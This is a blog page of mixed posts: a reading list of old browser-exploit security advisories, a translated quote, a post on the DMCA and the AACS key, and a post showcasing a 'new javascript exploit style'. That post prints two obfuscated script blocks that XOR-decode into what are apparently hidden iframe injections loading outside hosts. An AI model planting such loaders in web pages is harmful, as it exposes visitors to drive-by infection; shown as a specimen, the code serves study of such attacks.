Great Reading List on Web Exploits

I was reading up on inet-lux and found a great blog post in spanish which provides a must read references list. I ended up here reading about a java based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone want to donate an IDA Pro license?

[1]:
Microsoft Security Bulletin MS06-014
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Microsoft Security Bulletin MS03-011
Flaw in Microsoft VM Could Enable Compromise System (816093)
http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx

Microsoft Internet Explorer Javascript Window () Vulnerability:
Microsoft Security Bulletin MS05-054
Cumulative Security for Update Internet Explorer (905915)
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Microsoft Security Bulletin MS06-006
Vulnerability in Windows Average Player Plug-in with Non-Microsoft Internet
Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx

Mozilla Foundation Security Advisory 2005-50
Exploitable crash in InstallVersion.com pareTo (Firefox, Mozilla Suite)
http://www.mozilla.org/security/announce/2005/mfsa2005-50.html

Microsoft Security Advisory (917077)
Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/917077.mspx

Microsoft Security Bulletin MS06-006
Vulnerability in Windows Average Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx

IE ms-its: and mk: @MSITStore: vulnerability:
Microsoft Security Bulletin MS04-013
Cumulative Security for Update Outlook Express (837009)
http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx

– [2]:
http://www.enciclopediavirus.com/virus/vervirus.php?id=3456

Source: http://www.rzw.com.ar
___

Musings of a Chinese Vegetarian

Evil is the most dangerous when done in secret. Good is the least admirable when performed in public. In other words, evil is less dangerous when it is manifest than when it is secret; good is more laudable when it is occult than then it is public.

translated by Yaichiro Isobe

User Generated Content

credit Jason Arends

credit: Jason Arends

New javascript exploit style

Now with passwords?

<script language=”JavaScript” type=”text/javascript”>
<!–
var
password=’5%60o%7Bhdl%29z%7Bj4+a%7D
%7Dy3%26%26fzlq%27ah%7Bm%24jf%7Bl%24qqq
%27jfd%26%7Bhgm%27yay+%29%7E%60m
%7Da4899%2C%29al%60na%7D48%3B99%29DH
%5BN@G%5E@M%5DA49%29DH%5BN@GAL@NA
%5D49%29AZYHJL49%29_ZYHJL49%29O%5B
HDLKF%5BML%5B49%29ZJ%5BFEE4GF75%26
%60o%7Bhdl75a%7B%29%7E%60m%7Da4+%3E
%3F9+%29z%60sl4+8+75m%60%7F%29z%7D
pel4+yfz%60%7D%60fg3%29hkzfe%7C%7Dl2%29
elo%7D3%29%2400000yq2%29%7Dfy3%29%24
00000yq2%29%7E%60m%7Da3%298yq2%29al
%60na%7D3%298yq2+7′;

function get(key){var ID=’9′;var out=””;var
i;for(i=0;i<key.length;i++)
{out+=String.fromCharCode(ID^key.charCodeAt(i));}
return out;}document.write(get(unescape(password)));
//–>
</script>  

<script language=”JavaScript” type=”text/javascript”>
<!–
var
password=’5%60o%7Bhdl%29z%7Bj4+a%7D%7Dy3
%26%2618%27%3B0%27%3B%3D8
%27%3B%3A%3F%26hjj%3B%26%7Ef%7Bb988
%3B%26%60gmlq%27yay+%29%7E%60m
%7Da48%29al%60na%7D4875%26%60o%7Bhdl7′;

function get(key){var ID=’9′;var out=””;var
i;for(i=0;i<key.length;i++){out+=String.fromCharCode(ID^key.charCodeAt(i));}
return out;}document.write(get(unescape(password)));
//–>
</script>

Aspects of the DMCA posting “The Key” violates

According to an article posted by EFF’s von Lohmann posting “The Key” will certainly violate aspects of the oft hated DMCA. A growing number of citizens in the US are starting to recognize just how badly the law conflicts with other guarantees of rights possessed by US citizens.

No person shall … offer to the public, provide, or otherwise traffic in any technology, product, service, device, component, or part thereof that –

(A) is primarily designed or produced for the purpose of circumventing a technological measure that effectively controls access to a work protected under this title;

(B) has only limited commercially significant purpose or use other than to circumvent a technological measure that effectively controls access to a work protected under this title; or

(C) is marketed by that person or another acting in concert with that person with that person’s knowledge for use in circumventing a technological measure that effectively controls access to a work protected under this title.

Companies like Cafe Press could find themselves facing criminal charges if certain passages of the DMCA are interpreted unfavorably.

If the offense is “willful and for purposes of commercial gain,” federal prosecuters can bring criminal charges

. The EFF article notes that this provision has only been used against commercial piracy till now but that doesn’t rule out the possibility. Technically selling a T-Shirt or trucker hat on Cafe Press with the 16 digit hex code is commercial trafficking in a decryption device if the AACS LA lawyers are to be believed.